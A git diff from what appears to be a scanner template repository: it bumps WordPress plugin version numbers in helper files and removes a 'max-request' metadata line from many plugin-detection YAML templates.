http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-and-footer-scripts.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 208 files changed, 8 insertions(+), 208 deletions(-) diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt index f15ec04e09..3b5ab14de2 100644 --- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt +++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt @@ -1 +1 @@ -4.4.4 \ No newline at end of file +4.4.5.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/better-wp-security.txt b/helpers/wordpress/plugins/better-wp-security.txt index 5f82703f92..1c61cc5bd9 100644 --- a/helpers/wordpress/plugins/better-wp-security.txt +++ b/helpers/wordpress/plugins/better-wp-security.txt @@ -1 +1 @@ -8.1.7 \ No newline at end of file +8.1.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/broken-link-checker.txt b/helpers/wordpress/plugins/broken-link-checker.txt index fae692e41d..7e541aec69 100644 --- a/helpers/wordpress/plugins/broken-link-checker.txt +++ b/helpers/wordpress/plugins/broken-link-checker.txt @@ -1 +1 @@ -2.2.1 \ No newline at end of file +2.2.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/cookie-law-info.txt b/helpers/wordpress/plugins/cookie-law-info.txt index 6ebad14888..711ee4f504 100644 --- a/helpers/wordpress/plugins/cookie-law-info.txt +++ b/helpers/wordpress/plugins/cookie-law-info.txt @@ -1 +1 @@ -3.1.2 \ No newline at end of file +3.1.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loco-translate.txt b/helpers/wordpress/plugins/loco-translate.txt index e46a05b196..68167133b9 100644 --- a/helpers/wordpress/plugins/loco-translate.txt +++ b/helpers/wordpress/plugins/loco-translate.txt @@ -1 +1 @@ -2.6.4 \ No newline at end of file +2.6.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/maintenance.txt b/helpers/wordpress/plugins/maintenance.txt index 109b44a452..497104f620 100644 --- a/helpers/wordpress/plugins/maintenance.txt +++ b/helpers/wordpress/plugins/maintenance.txt @@ -1 +1 @@ -4.07 \ No newline at end of file +4.08 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ml-slider.txt b/helpers/wordpress/plugins/ml-slider.txt index ebb8439a9b..0dc31e89d8 100644 --- a/helpers/wordpress/plugins/ml-slider.txt +++ b/helpers/wordpress/plugins/ml-slider.txt @@ -1 +1 @@ -3.36.0 \ No newline at end of file +3.37.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index f9da12e118..c0be8a7992 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -6.3.2 \ No newline at end of file +6.4.0 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ 